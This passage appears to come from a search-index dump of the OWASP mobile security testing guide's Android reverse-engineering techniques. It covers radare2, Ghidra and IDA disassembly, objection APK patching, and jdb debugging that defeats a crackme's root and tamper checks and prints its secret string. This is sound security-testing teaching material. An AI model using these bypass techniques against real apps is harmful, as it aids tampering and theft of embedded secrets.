[0x00001760]> aa?\nUsage: aa[0*?] # see also 'af' and 'afna'\n| aa alias for 'af@@ sym.*;af@entry0;afva'\n| aaa[?] autoname functions after aa (see afna)\n| aab abb across bin.sections.rx\n| aac [len] analyze function calls (af @@ `pi len~call[1]`)\n| aac* [len] flag function calls without performing a complete analysis\n| aad [len] analyze data references to code\n| aae [len] ([addr]) analyze references with ESIL (optionally to address)\n| aaf[e|t] analyze all functions (e anal.hasnext=1;afr @@c:isq) (aafe=aef@@f)\n| aaF [sym*] set anal.in=block for all the spaces between flags matching glob\n| aaFa [sym*] same as aaF but uses af/a2f instead of af+/afb+ (slower but more accurate)\n| aai[j] show info of all analysis parameters\n| aan autoname functions that either start with fcn.* or sym.func.*\n| aang find function and symbol names from golang binaries\n| aao analyze all objc references\n| aap find and analyze function preludes\n| aar[?] [len] analyze len bytes of instructions for references\n| aas [len] analyze symbols (af @@= `isq~[0]`)\n| aaS analyze all flags starting with sym. (af @@ sym.*)\n| aat [len] analyze all consecutive functions in section\n| aaT [len] analyze code after trap-sleds\n| aau [len] list mem areas (larger than len bytes) not covered by functions\n| aav [sat] find values referencing a specific section or map\n
There is a thing that is worth noticing about radare2 vs other disassemblers like e.g. IDA Pro. The following quote from this article of radare2's blog (https://radareorg.github.io/blog/) offers a good summary.
Code analysis is not a quick operation, and not even predictable or taking a linear time to be processed. This makes starting times pretty heavy, compared to just loading the headers and strings information like it\u2019s done by default.
People that are used to IDA or Hopper just load the binary, go out to make a coffee and then when the analysis is done, they start doing the manual analysis to understand what the program is doing. It\u2019s true that those tools perform the analysis in background, and the GUI is not blocked. But this takes a lot of CPU time, and r2 aims to run in many more platforms than just high-end desktop computers.
That said, please see section \"Reviewing Disassembled Native Code\" to learn more about how radare2 can help us perform our reversing tasks much faster. For example, getting the disassembly of a specific function is a trivial task that can be performed in one command.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0018/#ida-pro","title":"IDA Pro","text":"If you own an IDA Pro license, open the file and once in the \"Load new file\" dialog, choose \"ELF for ARM (Shared Object)\" as the file type (IDA should detect this automatically), and \"ARM Little-Endian\" as the processor type.
The freeware version of IDA Pro unfortunately does not support the ARM processor type.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/","title":"Retrieving Strings","text":"While performing any kind of binary analysis, strings can be considered as one of the most valuable starting points as they provide context. For example, an error log string like \"Data encryption failed.\" gives us a hint that the adjoining code might be responsible for performing some kind of encryption operation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/#java-and-kotlin-bytecode","title":"Java and Kotlin Bytecode","text":"As we already know, all the Java and Kotlin bytecode of an Android application is compiled into a DEX file. Each DEX file contains a list of string identifiers (strings_ids), which contains all the string identifiers used in the binary whenever a string is referred, including internal naming (e.g, type descriptors) or constant objects referred by the code (e.g hardcoded strings). You can simply dump this list using tools such as Ghidra (GUI based) or Dextra (CLI based).
With Ghidra, strings can be obtained by simply loading the DEX file and selecting Window -> Defined strings in the menu.
Loading an APK file directly into Ghidra might lead to inconsistencies. Thus it is recommended to extract the DEX file by unzipping the APK file and then loading it into Ghidra.
With Dextra, you can dump all the strings using the following command:
dextra -S classes.dex\n
The output from Dextra can be manipulated using standard Linux commands, for example, using grep
to search for certain keywords.
It is important to know that the list of strings obtained using the above tools can be very big, as it also includes the various class and package names used in the application. Going through the complete list, especially for big binaries, can be very cumbersome. Thus, it is recommended to start with keyword-based searching and go through the list only when keyword search does not help. Some generic keywords which can be a good starting point are - password, key, and secret. Other useful keywords specific to the context of the app can be obtained while you are using the app itself. For instance, imagine that the app has a login form; you can take note of the displayed placeholder or title text of the input fields and use that as an entry point for your static analysis.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/#native-code","title":"Native Code","text":"In order to extract strings from native code used in an Android application, you can use GUI tools such as Ghidra or iaito or rely on CLI-based tools such as the strings Unix utility (strings <path_to_binary>
) or radare2's rabin2 (rabin2 -zz <path_to_binary>
). When using the CLI-based ones you can take advantage of other tools such as grep (e.g. in conjunction with regular expressions) to further filter and analyze the results.
There are many RE tools that support retrieving Java cross references. For many of the GUI-based ones, this is usually done by right clicking on the desired function and selecting the corresponding option, e.g. Show References to in Ghidra or Find Usage in jadx.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0020/#native-code","title":"Native Code","text":"Similarly to Java analysis, you can also use Ghidra to analyze native libraries and obtain cross references by right clicking the desired function and selecting Show References to.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0021/","title":"Information Gathering - API Usage","text":"The Android platform provides many in-built libraries for frequently used functionalities in applications, for example cryptography, Bluetooth, NFC, network or location libraries. Determining the presence of these libraries in an application can give us valuable information about its nature.
For instance, if an application is importing javax.crypto.Cipher
, it indicates that the application will be performing some kind of cryptographic operation. Fortunately, cryptographic calls are very standard in nature, i.e., they need to be called in a particular order to work correctly; this knowledge can be helpful when analyzing cryptography APIs. For example, by looking for the Cipher.getInstance
function, we can determine the cryptographic algorithm being used. With such an approach we can directly move to analyzing cryptographic assets, which often are very critical in an application. Further information on how to analyze Android's cryptographic APIs is discussed in the section \"Android Cryptographic APIs\".
Similarly, the above approach can be used to determine where and how an application is using NFC. For instance, an application using Host-based Card Emulation for performing digital payments must use the android.nfc
package. Therefore, a good starting point for NFC API analysis would be to consult the Android Developer Documentation to get some ideas and start searching for critical functions such as processCommandApdu
from the android.nfc.cardemulation.HostApduService
class.
Most of the apps you might encounter connect to remote endpoints. Even before you perform any dynamic analysis (e.g. traffic capture and analysis), you can obtain some initial inputs or entry points by enumerating the domains to which the application is supposed to communicate to.
Typically these domains will be present as strings within the binary of the application. One way to achieve this is by using automated tools such as APKEnum or MobSF. Alternatively, you can grep for the domain names by using regular expressions. For this you can target the app binary directly or reverse engineer it and target the disassembled or decompiled code. The latter option has a clear advantage: it can provide you with context, as you'll be able to see in which context each domain is being used (e.g. class and method).
From here on you can use this information to derive more insights which might be of use later during your analysis, e.g. you could match the domains to the pinned certificates or the Network Security Configuration file or perform further reconnaissance on domain names to know more about the target environment. When evaluating an application it is important to check the Network Security Configuration file, as often (less secure) debug configurations might be pushed into final release builds by mistake.
The implementation and verification of secure connections can be an intricate process and there are numerous aspects to consider. For instance, many applications use other protocols apart from HTTP such as XMPP or plain TCP packets, or perform certificate pinning in an attempt to deter MITM attacks but unfortunately have severe logical bugs in its implementation or an inherently wrong security network configuration.
Remember that in most of the cases, just using static analysis will not be enough and might even turn out to be extremely inefficient when compared to the dynamic alternatives which will get much more reliable results (e.g. using an interceptor proxy). In this section we've just slightly touched the surface; please refer to the section \"Basic Network Monitoring/Sniffing\" in the \"Android Basic Security Testing\" chapter and also check the test cases in the \"Android Network Communication\" chapter.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0023/","title":"Reviewing Decompiled Java Code","text":"Following the example from \"Decompiling Java Code\", we assume that you've successfully decompiled and opened the UnCrackable App for Android Level 1 in IntelliJ. As soon as IntelliJ has indexed the code, you can browse it just like you'd browse any other Java project. Note that many of the decompiled packages, classes, and methods have weird one-letter names; this is because the bytecode has been \"minified\" with ProGuard at build time. This is a basic type of obfuscation that makes the bytecode a little more difficult to read, but with a fairly simple app like this one, it won't cause you much of a headache. When you're analyzing a more complex app, however, it can get quite annoying.
When analyzing obfuscated code, annotating class names, method names, and other identifiers as you go along is a good practice. Open the MainActivity
class in the package sg.vantagepoint.uncrackable1
. The method verify
is called when you tap the \"verify\" button. This method passes the user input to a static method called a.a
, which returns a boolean value. It seems plausible that a.a
verifies user input, so we'll refactor the code to reflect this.
Right-click the class name (the first a
in a.a
) and select Refactor -> Rename from the drop-down menu (or press Shift-F6). Change the class name to something that makes more sense given what you know about the class so far. For example, you could call it \"Validator\" (you can always revise the name later). a.a
now becomes Validator.a
. Follow the same procedure to rename the static method a
to check_input
.
Congratulations, you just learned the fundamentals of static analysis! It is all about theorizing, annotating, and gradually revising theories about the analyzed program until you understand it completely or, at least, well enough for whatever you want to achieve.
Next, Ctrl+click (or Command+click on Mac) on the check_input
method. This takes you to the method definition. The decompiled method looks like this:
public static boolean check_input(String string) {\n    byte[] arrby = Base64.decode((String) \\\n        \"5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\", (int)0);\n    byte[] arrby2 = new byte[]{};\n    try {\n        arrby = sg.vantagepoint.a.a.a(Validator.b(\"8d127684cbc37c17616d806cf50473cc\"), arrby);\n        arrby2 = arrby;\n    }\n    catch (Exception exception) {\n        Log.d((String)\"CodeCheck\", (String)(\"AES error:\" + exception.getMessage()));\n    }\n    if (string.equals(new String(arrby2))) {\n        return true;\n    }\n    return false;\n  }\n
So, you have a Base64-encoded String that's passed to the function a
in the package \\ sg.vantagepoint.a.a
(again, everything is called a
) along with something that looks suspiciously like a hex-encoded encryption key (16 hex bytes = 128bit, a common key length). What exactly does this particular a
do? Ctrl-click it to find out.
public class a {\n public static byte[] a(byte[] object, byte[] arrby) {\n object = new SecretKeySpec((byte[])object, \"AES/ECB/PKCS7Padding\");\n Cipher cipher = Cipher.getInstance(\"AES\");\n cipher.init(2, (Key)object);\n return cipher.doFinal(arrby);\n }\n}\n
Now you're getting somewhere: it's simply standard AES-ECB. Looks like the Base64 string stored in arrby
in check_input
is a ciphertext. It is decrypted with 128bit AES, then compared with the user input. As a bonus task, try to decrypt the extracted ciphertext and find the secret value!
A faster way to get the decrypted string is to add dynamic analysis. We'll revisit UnCrackable App for Android Level 1 later to show how (e.g. in the Debugging section), so don't delete the project yet!
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/","title":"Reviewing Disassembled Native Code","text":"Following the example from \"Disassembling Native Code\" we will use different disassemblers to review the disassembled native code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#radare2","title":"radare2","text":"Once you've opened your file in radare2 you should first get the address of the function you're looking for. You can do this by listing or getting information i
about the symbols s
(is
) and grepping (~
radare2's built-in grep) for some keyword, in our case we're looking for JNI related symbols so we enter \"Java\":
$ r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n...\n[0x00000e3c]> is~Java\n003 0x00000e78 0x00000e78 GLOBAL FUNC 16 Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
The method can be found at address 0x00000e78
. To display its disassembly simply run the following commands:
[0x00000e3c]> e emu.str=true;\n[0x00000e3c]> s 0x00000e78\n[0x00000e78]> af\n[0x00000e78]> pdf\n\u256d (fcn) sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI 12\n\u2502 sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI (int32_t arg1);\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 0x00000e78 ~ 0268 ldr r2, [r0] ; arg1\n\u2502 ;-- aav.0x00000e79:\n\u2502 ; UNKNOWN XREF from aav.0x00000189 (+0x3)\n\u2502 0x00000e79 unaligned\n\u2502 0x00000e7a 0249 ldr r1, aav.0x00000f3c ; [0xe84:4]=0xf3c aav.0x00000f3c\n\u2502 0x00000e7c d2f89c22 ldr.w r2, [r2, 0x29c]\n\u2502 0x00000e80 7944 add r1, pc ; \"Hello from C++\" section..rodata\n\u2570 0x00000e82 1047 bx r2\n
Let's explain the previous commands:
e emu.str=true;
enables radare2's string emulation. Thanks to this, we can see the string we're looking for (\"Hello from C++\").s 0x00000e78
is a seek to the address s 0x00000e78
, where our target function is located. We do this so that the following commands apply to this address.pdf
means print disassembly of function.Using radare2 you can quickly run commands and exit by using the flags -qc '<commands>'
. From the previous steps we know already what to do so we will simply put everything together:
$ r2 -qc 'e emu.str=true; s 0x00000e78; af; pdf' HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n\n\u256d (fcn) sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI 12\n\u2502 sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI (int32_t arg1);\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 0x00000e78 0268 ldr r2, [r0] ; arg1\n\u2502 0x00000e7a 0249 ldr r1, [0x00000e84] ; [0xe84:4]=0xf3c\n\u2502 0x00000e7c d2f89c22 ldr.w r2, [r2, 0x29c]\n\u2502 0x00000e80 7944 add r1, pc ; \"Hello from C++\" section..rodata\n\u2570 0x00000e82 1047 bx r2\n
Notice that in this case we're not starting with the -A
flag not running aaa
. Instead, we just tell radare2 to analyze that one function by using the analyze function af
command. This is one of those cases where we can speed up our workflow because you're focusing on some specific part of an app.
The workflow can be further improved by using r2ghidra, a deep integration of Ghidra decompiler for radare2. r2ghidra generates decompiled C code, which can aid in quickly analyzing the binary.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#ida-pro","title":"IDA Pro","text":"We assume that you've successfully opened lib/armeabi-v7a/libnative-lib.so
in IDA pro. Once the file is loaded, click into the \"Functions\" window on the left and press Alt+t
to open the search dialog. Enter \"java\" and hit enter. This should highlight the Java_sg_vantagepoint_helloworld_ MainActivity_stringFromJNI
function. Double-click the function to jump to its address in the disassembly Window. \"Ida View-A\" should now show the disassembly of the function.
Not a lot of code there, but you should analyze it. The first thing you need to know is that the first argument passed to every JNI function is a JNI interface pointer. An interface pointer is a pointer to a pointer. This pointer points to a function table: an array of even more pointers, each of which points to a JNI interface function (is your head spinning yet?). The function table is initialized by the Java VM and allows the native function to interact with the Java environment.
With that in mind, let's have a look at each line of assembly code.
LDR R2, [R0]\n
Remember: the first argument (in R0) is a pointer to the JNI function table pointer. The LDR
instruction loads this function table pointer into R2.
LDR R1, =aHelloFromC\n
This instruction loads into R1 the PC-relative offset of the string \"Hello from C++\". Note that this string comes directly after the end of the function block at offset 0xe84. Addressing relative to the program counter allows the code to run independently of its position in memory.
LDR.W R2, [R2, #0x29C]\n
This instruction loads the function pointer at offset 0x29C in the JNI function pointer table (pointed to by R2) into R2. This is the NewStringUTF
function. You can look at the list of function pointers in jni.h, which is included in the Android NDK. The function prototype looks like this:
jstring (*NewStringUTF)(JNIEnv*, const char*);\n
The function takes two arguments: the JNIEnv pointer (already in R0) and a String pointer. Next, the current value of PC is added to R1, resulting in the absolute address of the static string \"Hello from C++\" (PC + offset).
ADD R1, PC\n
Finally, the program executes a branch instruction to the NewStringUTF
function pointer loaded into R2:
BX R2\n
When this function returns, R0 contains a pointer to the newly constructed UTF string. This is the final return value, so R0 is left unchanged and the function returns.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#ghidra","title":"Ghidra","text":"After opening the library in Ghidra we can see all the functions defined in the Symbol Tree panel under Functions. The native library for the current application is relatively very small. There are three user defined functions: FUN_001004d0
, FUN_0010051c
, and Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
. The other symbols are not user defined and are generated for proper functioning of the shared library. The instructions in the function Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
are already discussed in detail in previous sections. In this section we can look into the decompilation of the function.
Inside the current function there is a call to another function, whose address is obtained by accessing an offset in the JNIEnv
pointer (found as plParm1
). This logic has been diagrammatically demonstrated above as well. The corresponding C code for the disassembled function is shown in the Decompiler window. This decompiled C code makes it much easier to understand the function call being made. Since this function is small and extremely simple, the decompilation output is very accurate; however, this can change drastically when dealing with complex functions.
You should use tools for efficient static analysis. They allow the tester to focus on the more complicated business logic. A plethora of static code analyzers are available, ranging from open source scanners to full-blown enterprise-ready scanners. The best tool for the job depends on budget, client requirements, and the tester's preferences.
Some static analyzers rely on the availability of the source code; others take the compiled APK as input. Keep in mind that static analyzers may not be able to find all problems by themselves even though they can help us focus on potential problems. Review each finding carefully and try to understand what the app is doing to improve your chances of finding vulnerabilities.
Configure the static analyzer properly to reduce the likelihood of false positives and maybe only select several vulnerability categories in the scan. The results generated by static analyzers can otherwise be overwhelming, and your efforts can be counterproductive if you must manually investigate a large report.
There are several open source tools for automated security analysis of an APK.
Non-rooted devices have the benefit of replicating an environment that the application is intended to run on.
Thanks to tools like objection, you can patch the app in order to test it as if you were on a rooted device (but of course being jailed to that one app). To do that you have to perform one additional step: patch the APK to include the Frida gadget library.
Now you can use objection to dynamically analyze the application on non-rooted devices.
The following commands summarize how to patch and start dynamic analysis using objection using the UnCrackable App for Android Level 1 as an example:
# Download the Uncrackable APK\n$ wget https://raw.githubusercontent.com/OWASP/owasp-mastg/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk\n# Patch the APK with the Frida Gadget\n$ objection patchapk --source UnCrackable-Level1.apk\n# Install the patched APK on the android phone\n$ adb install UnCrackable-Level1.objection.apk\n# After running the mobile phone, objection will detect the running frida-server through the APK\n$ objection explore\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0027/","title":"Get Open Files","text":"You can use lsof
with the flag -p <pid>
to return the list of open files for the specified process. See the man page for more options.
# lsof -p 6233\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\n.foobar.c 6233 u0_a97 cwd DIR 0,1 0 1 /\n.foobar.c 6233 u0_a97 rtd DIR 0,1 0 1 /\n.foobar.c 6233 u0_a97 txt REG 259,11 23968 399 /system/bin/app_process64\n.foobar.c 6233 u0_a97 mem unknown /dev/ashmem/dalvik-main space (region space) (deleted)\n.foobar.c 6233 u0_a97 mem REG 253,0 2797568 1146914 /data/dalvik-cache/arm64/system@framework@boot.art\n.foobar.c 6233 u0_a97 mem REG 253,0 1081344 1146915 /data/dalvik-cache/arm64/system@framework@boot-core-libart.art\n...\n
In the above output, the most relevant fields for us are:
NAME
: path of the file.TYPE
: type of the file, for example, whether the file is a directory or a regular file. This can be extremely useful to spot unusual files when monitoring applications using obfuscation or other anti-reverse engineering techniques, without having to reverse the code. For instance, an application might be performing encryption-decryption of data and storing it in a file temporarily.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0028/","title":"Get Open Connections","text":"You can find system-wide networking information in /proc/net
or just by inspecting the /proc/<pid>/net
directories (for some reason not process specific). There are multiple files present in these directories, of which tcp
, tcp6
and udp
might be considered relevant from the tester's perspective.
# cat /proc/7254/net/tcp\nsl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode\n...\n69: 1101A8C0:BB2F 9A447D4A:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75412 1 0000000000000000 20 3 19 10 -1\n70: 1101A8C0:917C E3CB3AD8:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75553 1 0000000000000000 20 3 23 10 -1\n71: 1101A8C0:C1E3 9C187D4A:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75458 1 0000000000000000 20 3 19 10 -1\n...\n
In the output above, the most relevant fields for us are:
rem_address
: remote address and port number pair (in hexadecimal representation).tx_queue
and rx_queue
: the outgoing and incoming data queue in terms of kernel memory usage. These fields give an indication of how actively the connection is being used.uid
: containing the effective UID of the creator of the socket.Another alternative is to use the netstat
command, which also provides information about the network activity for the complete system in a more readable format, and can be easily filtered as per our requirements. For instance, we can easily filter it by PID:
# netstat -p | grep 24685\nActive Internet connections (w/o servers)\nProto Recv-Q Send-Q Local Address Foreign Address State PID/Program Name\ntcp 0 0 192.168.1.17:47368 172.217.194.103:https CLOSE_WAIT 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:47233 172.217.194.94:https CLOSE_WAIT 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:38480 sc-in-f100.1e100.:https ESTABLISHED 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:44833 74.125.24.91:https ESTABLISHED 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:38481 sc-in-f100.1e100.:https ESTABLISHED 24685/com.google.android.youtube\n...\n
netstat
output is clearly more user friendly than reading /proc/<pid>/net
. The most relevant fields for us, similar to the previous output, are the following:
Foreign Address
: remote address and port number pair (port number can be replaced with the well-known name of a protocol associated with the port).Recv-Q
and Send-Q
: Statistics related to receive and send queue. Gives an indication on how actively the connection is being used.State
: the state of a socket, for example, if the socket is in active use (ESTABLISHED
) or closed (CLOSED
).The file /proc/<pid>/maps
contains the currently mapped memory regions and their access permissions. Using this file we can get the list of the libraries loaded in the process.
# cat /proc/9568/maps\n12c00000-52c00000 rw-p 00000000 00:04 14917 /dev/ashmem/dalvik-main space (region space) (deleted)\n6f019000-6f2c0000 rw-p 00000000 fd:00 1146914 /data/dalvik-cache/arm64/system@framework@boot.art\n...\n7327670000-7329747000 r--p 00000000 fd:00 1884627 /data/app/com.google.android.gms-4FJbDh-oZv-5bCw39jkIMQ==/oat/arm64/base.odex\n..\n733494d000-7334cfb000 r-xp 00000000 fd:00 1884542 /data/app/com.google.android.youtube-Rl_hl9LptFQf3Vf-JJReGw==/lib/arm64/libcronet.80.0.3970.3.so\n...\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0029/#using-frida","title":"Using Frida","text":"You can retrieve process related information straight from the Frida CLI by using the Process
command. Within the Process
command the function enumerateModules
lists the libraries loaded into the process memory.
[Huawei Nexus 6P::sg.vantagepoint.helloworldjni]-> Process.enumerateModules()\n[\n {\n \"base\": \"0x558a442000\",\n \"name\": \"app_process64\",\n \"path\": \"/system/bin/app_process64\",\n \"size\": 32768\n },\n {\n \"base\": \"0x78bc984000\",\n \"name\": \"libandroid_runtime.so\",\n \"path\": \"/system/lib64/libandroid_runtime.so\",\n \"size\": 2011136\n },\n...\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0030/","title":"Sandbox Inspection","text":"The application data is stored in a sandboxed directory present at /data/data/<app_package_name>
. The content of this directory has already been discussed in detail in the \"Accessing App Data Directories\" section.
So far, you've been using static analysis techniques without running the target apps. In the real world, especially when reversing malware or more complex apps, pure static analysis is very difficult. Observing and manipulating an app during runtime makes it much, much easier to decipher its behavior. Next, we'll have a look at dynamic analysis methods that help you do just that.
Android apps support two different types of debugging: Debugging on the level of the Java runtime with the Java Debug Wire Protocol (JDWP), and Linux/Unix-style ptrace-based debugging on the native layer, both of which are valuable to reverse engineers.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-release-apps","title":"Debugging Release Apps","text":"Dalvik and ART support the JDWP, a protocol for communication between the debugger and the Java virtual machine (VM) that it debugs. JDWP is a standard debugging protocol that's supported by all command line tools and Java IDEs, including jdb, IntelliJ, and Eclipse. Android's implementation of JDWP also includes hooks for supporting extra features implemented by the Dalvik Debug Monitor Server (DDMS).
A JDWP debugger allows you to step through Java code, set breakpoints on Java methods, and inspect and modify local and instance variables. You'll use a JDWP debugger most of the time you debug \"normal\" Android apps (i.e., apps that don't make many calls to native libraries).
In the following section, we'll show how to solve the UnCrackable App for Android Level 1 with jdb alone. Note that this is not an efficient way to solve this crackme. Actually you can do it much faster with Frida and other methods, which we'll introduce later in the guide. This, however, serves as an introduction to the capabilities of the Java debugger.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-with-jdb","title":"Debugging with jdb","text":"The adb
command line tool was introduced in the \"Android Basic Security Testing\" chapter. You can use its adb jdwp
command to list the process IDs of all debuggable processes running on the connected device (i.e., processes hosting a JDWP transport). With the adb forward
command, you can open a listening socket on your host computer and forward this socket's incoming TCP connections to the JDWP transport of a chosen process.
$ adb jdwp\n12167\n$ adb forward tcp:7777 jdwp:12167\n
You're now ready to attach jdb. Attaching the debugger, however, causes the app to resume, which you don't want. You want to keep it suspended so that you can explore first. To prevent the process from resuming, pipe the suspend
command into jdb:
$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\nInitializing jdb ...\n> All threads suspended.\n>\n
You're now attached to the suspended process and ready to go ahead with the jdb commands. Entering ?
prints the complete list of commands. Unfortunately, the Android VM doesn't support all available JDWP features. For example, the redefine
command, which would let you redefine a class's code, is not supported. Another important restriction is that line breakpoints won't work because the release bytecode doesn't contain line information. Method breakpoints do work, however. Useful working commands include:
Let's revisit the decompiled code from the UnCrackable App for Android Level 1 and think about possible solutions. A good approach would be suspending the app in a state where the secret string is held in a variable in plain text so you can retrieve it. Unfortunately, you won't get that far unless you deal with the root/tampering detection first.
Review the code and you'll see that the method sg.vantagepoint.uncrackable1.MainActivity.a
displays the \"This in unacceptable...\" message box. This method creates an AlertDialog
and sets a listener class for the onClick
event. This class (named b
) has a callback method that will terminate the app once the user taps the OK button. To prevent the user from simply canceling the dialog, the setCancelable
method is called.
private void a(final String title) {\n final AlertDialog create = new AlertDialog$Builder((Context)this).create();\n create.setTitle((CharSequence)title);\n create.setMessage((CharSequence)\"This in unacceptable. The app is now going to exit.\");\n create.setButton(-3, (CharSequence)\"OK\", (DialogInterface$OnClickListener)new b(this));\n create.setCancelable(false);\n create.show();\n }\n
You can bypass this with a little runtime tampering. With the app still suspended, set a method breakpoint on android.app.Dialog.setCancelable
and resume the app.
> stop in android.app.Dialog.setCancelable\nSet breakpoint android.app.Dialog.setCancelable\n> resume\nAll threads resumed.\n>\nBreakpoint hit: \"thread=main\", android.app.Dialog.setCancelable(), line=1,110 bci=0\nmain[1]\n
The app is now suspended at the first instruction of the setCancelable
method. You can print the arguments passed to setCancelable
with the locals
command (the arguments are shown incorrectly under \"local variables\").
main[1] locals\nMethod arguments:\nLocal variables:\nflag = true\n
setCancelable(true)
was called, so this can't be the call we're looking for. Resume the process with the resume
command.
main[1] resume\nBreakpoint hit: \"thread=main\", android.app.Dialog.setCancelable(), line=1,110 bci=0\nmain[1] locals\nflag = false\n
You've now reached a call to setCancelable
with the argument false
. Set the variable to true
with the set
command and resume.
main[1] set flag = true\n flag = true = true\nmain[1] resume\n
Repeat this process, setting flag
to true
each time the breakpoint is reached, until the alert box is finally displayed (the breakpoint will be reached five or six times). The alert box should now be cancelable! Tap the screen next to the box and it will close without terminating the app.
Now that the anti-tampering is out of the way, you're ready to extract the secret string! In the \"static analysis\" section, you saw that the string is decrypted with AES, then compared with the string input to the message box. The method equals
of the java.lang.String
class compares the string input with the secret string. Set a method breakpoint on java.lang.String.equals
, enter an arbitrary text string in the edit field, and tap the \"verify\" button. Once the breakpoint is reached, you can read the method argument with the locals
command.
> stop in java.lang.String.equals\nSet breakpoint java.lang.String.equals\n>\nBreakpoint hit: \"thread=main\", java.lang.String.equals(), line=639 bci=2\n\nmain[1] locals\nMethod arguments:\nLocal variables:\nother = \"radiusGravity\"\nmain[1] cont\n\nBreakpoint hit: \"thread=main\", java.lang.String.equals(), line=639 bci=2\n\nmain[1] locals\nMethod arguments:\nLocal variables:\nother = \"I want to believe\"\nmain[1] cont\n
This is the plaintext string you're looking for!
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-with-an-ide","title":"Debugging with an IDE","text":"Setting up a project in an IDE with the decompiled sources is a neat trick that allows you to set method breakpoints directly in the source code. In most cases, you should be able to single-step through the app and inspect the state of variables with the GUI. The experience won't be perfect, it's not the original source code after all, so you won't be able to set line breakpoints and things will sometimes simply not work correctly. Then again, reversing code is never easy, and efficiently navigating and debugging plain old Java code is a pretty convenient way of doing it. A similar method has been described in the NetSPI blog.
To set up IDE debugging, first create your Android project in IntelliJ and copy the decompiled Java sources into the source folder as described above in the \"Reviewing Decompiled Java Code\" section. On the device, choose the app as debug app on the \"Developer options\" (UnCrackable App for Android Level 1 in this tutorial), and make sure you've switched on the \"Wait For Debugger\" feature.
Once you tap the app icon from the launcher, it will be suspended in \"Wait For Debugger\" mode.
Now you can set breakpoints and attach to the app process with the \"Attach Debugger\" toolbar button.
Note that only method breakpoints work when debugging an app from decompiled sources. Once a method breakpoint is reached, you'll get the chance to single step during the method execution.
After you choose the app from the list, the debugger will attach to the app process and you'll reach the breakpoint that was set on the onCreate
method. This app triggers anti-debugging and anti-tampering controls within the onCreate
method. That's why setting a breakpoint on the onCreate
method just before the anti-tampering and anti-debugging checks are performed is a good idea.
Next, single-step through the onCreate
method by clicking \"Force Step Into\" in Debugger view. The \"Force Step Into\" option allows you to debug the Android framework functions and core Java classes that are normally ignored by debuggers.
Once you \"Force Step Into\", the debugger will stop at the beginning of the next method, which is the a
method of the class sg.vantagepoint.a.c
.
This method searches for the \"su\" binary within a list of directories (/system/xbin
and others). Since you're running the app on a rooted device/emulator, you need to defeat this check by manipulating variables and/or function return values.
You can see the directory names inside the \"Variables\" window by clicking \"Step Over\" in the Debugger view to step into and through the a
method.
Step into the System.getenv
method with the \"Force Step Into\" feature.
After you get the colon-separated directory names, the debugger cursor will return to the beginning of the a
method, not to the next executable line. This happens because you're working on the decompiled code instead of the source code. This skipping makes following the code flow crucial to debugging decompiled applications. Otherwise, identifying the next line to be executed would become complicated.
If you don't want to debug core Java and Android classes, you can step out of the function by clicking \"Step Out\" in the Debugger view. Using \"Force Step Into\" might be a good idea once you reach the decompiled sources and \"Step Out\" of the core Java and Android classes. This will help speed up debugging while you keep an eye on the return values of the core class functions.
After the a
method gets the directory names, it will search for the su
binary within these directories. To defeat this check, step through the detection method and inspect the variable content. Once execution reaches a location where the su
binary would be detected, modify one of the variables holding the file name or directory name by pressing F2 or right-clicking and choosing \"Set Value\".
Once you modify the binary name or the directory name, File.exists
should return false
.
This defeats the first root detection control of the app. The remaining anti-tampering and anti-debugging controls can be defeated in similar ways so that you can finally reach the secret string verification functionality.
The secret code is verified by the method a
of class sg.vantagepoint.uncrackable1.a
. Set a breakpoint on method a
and \"Force Step Into\" when you reach the breakpoint. Then, single-step until you reach the call to String.equals
. This is where user input is compared with the secret string.
You can see the secret string in the \"Variables\" view when you reach the String.equals
method call.
Native code on Android is packed into ELF shared libraries and runs just like any other native Linux program. Consequently, you can debug it with standard tools (including GDB and built-in IDE debuggers such as IDA Pro) as long as they support the device's processor architecture (most devices are based on ARM chipsets, so this is usually not an issue).
You'll now set up your JNI demo app, HelloWorld-JNI.apk, for debugging. It's the same APK you downloaded in \"Statically Analyzing Native Code\". Use adb install
to install it on your device or on an emulator.
adb install HelloWorld-JNI.apk\n
If you followed the instructions at the beginning of this chapter, you should already have the Android NDK. It contains prebuilt versions of gdbserver for various architectures. Copy the gdbserver binary to your device:
